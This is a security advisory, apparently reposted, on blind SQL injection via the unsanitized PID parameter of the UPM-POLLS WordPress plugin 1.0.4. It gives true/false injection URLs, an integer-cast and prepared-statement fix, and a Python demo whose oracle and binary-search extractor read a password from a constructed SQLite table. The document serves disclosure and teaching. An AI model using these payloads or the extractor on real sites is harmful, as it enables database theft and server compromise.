Title: Blind SQL injection in the UPM-POLLS WordPress plugin 1.0.4
Author: Saif El-Sherei www.2cto.com
Download: http://downloads.wordpress.org/plugin/upm-polls.1.0.4.zip
Affected Version: 1.0.4
Test Platform: wordpress 3.2.1, Firefox 4, XAMPP
Program Information:
Best plugin to create polls for your site. Everything is smoother, faster,
and seamless, like WordPress itself.
Poll manager,
Ability to set general and post/page-specific polls,
Ability to leaf through the polls,
Ability to add a certain poll to certain post content,
Ability to show polls either with or without current results.
Description:
The PID parameter of the GET request is not sanitized before it is
inserted into the database query. This allows an attacker, or any user who
can view poll results (apparently all users), to perform blind SQL injection,
extract database data and possibly compromise the whole server. A PoC is
provided with both a true and a false condition: when the injected condition
is true the poll results are rendered, when it is false the page is blank,
which is the one-bit oracle needed to read out arbitrary data.
Test Example 1 (TRUE):
http://www.bkjia.com/wordpress/wp-admin/admin-ajax.php?action=upm_ayax_polls_result&do=result&post=1&type=general&PID=2 and 1=1
"Poll results for poll 2 are displayed"
Test Example 2 (FALSE):
http://www.bkjia.com/wordpress/wp-admin/admin-ajax.php?action=upm_ayax_polls_result&do=result&post=1&type=general&PID=2 and 1=2
"Blank page is displayed"
(The spaces in the PID value are sent URL-encoded as %20; the host name is the reposting site's placeholder for the test installation.)
Repair solution provided by www.2cto.com:
Filter the PID parameter on this page before it reaches the query: accept only an integer value (cast it, e.g. with intval()) or bind it through a prepared statement instead of concatenating it into the SQL string.
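The following Python script is an added illustration and is not part of the original advisory or of the plugin's code. It reproduces the behaviour described above against a constructed in-memory SQLite database: results_vulnerable() builds the SQL string from PID by concatenation, exactly the bug the advisory describes; oracle() treats "poll results displayed" as true and "blank page" as false; and extract() turns that one bit per request into a character-by-character read of any value the database user can see, which is what "extract database data" means in practice. results_fixed() shows the hardened form from the repair note. The table and column names, the sample rows and the user table are assumptions made for the demo; the real plugin runs on MySQL, where SQLite's unicode()/substr() correspond to ASCII()/SUBSTRING().

```python
import re
import sqlite3


def make_db():
    """Constructed stand-in for the plugin's database (names and rows are assumed,
    they are not taken from the real plugin)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE polls (id INTEGER PRIMARY KEY, question TEXT)")
    con.executemany("INSERT INTO polls VALUES (?, ?)",
                    [(1, "Favourite colour?"), (2, "Best editor?")])
    con.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, login TEXT, pw TEXT)")
    con.execute("INSERT INTO users VALUES (1, 'admin', 'S3cret!')")
    con.commit()
    return con


def results_vulnerable(con, pid):
    """Mirrors the advisory's bug: PID is concatenated into the query unfiltered."""
    sql = "SELECT question FROM polls WHERE id = " + pid
    return con.execute(sql).fetchall()


def results_fixed(con, pid):
    """Hardened form: PID must be a plain integer and is bound, never concatenated.
    In WordPress this is intval()/absint() plus $wpdb->prepare()."""
    if not re.fullmatch(r"[0-9]+", pid):
        return []
    return con.execute("SELECT question FROM polls WHERE id = ?",
                       (int(pid),)).fetchall()


def oracle(con, payload):
    """Boolean oracle: True when poll results would be rendered, False for a blank page."""
    return len(results_vulnerable(con, payload)) > 0


def extract(con, expr, max_len=64):
    """Recover the string value of the SQL scalar expression `expr` (typically a
    subquery) one character at a time, using a binary search on the code point of
    each character. Every oracle() call is one HTTP request in a real attack;
    '2 and ...' keeps poll 2 as the row that gets displayed when the condition holds."""
    out = ""
    for i in range(1, max_len + 1):
        # Stop once we have passed the end of the value.
        if not oracle(con, f"2 and length(({expr})) >= {i}"):
            break
        lo, hi = 0, 127  # invariant: code point of character i is >= lo
        while lo < hi:
            mid = (lo + hi + 1) // 2
            if oracle(con, f"2 and unicode(substr(({expr}),{i},1)) >= {mid}"):
                lo = mid
            else:
                hi = mid - 1
        out += chr(lo)
    return out


if __name__ == "__main__":
    db = make_db()
    print("TRUE test :", oracle(db, "2 and 1=1"))
    print("FALSE test:", oracle(db, "2 and 1=2"))
    print("leaked    :", extract(db, "SELECT pw FROM users WHERE id = 1"))
    print("fixed     :", results_fixed(db, "2 and 1=1"), results_fixed(db, "2"))
```

Each character costs about seven requests with this search; real tools add timing or error channels only when the page gives no visible true/false difference, which here it does.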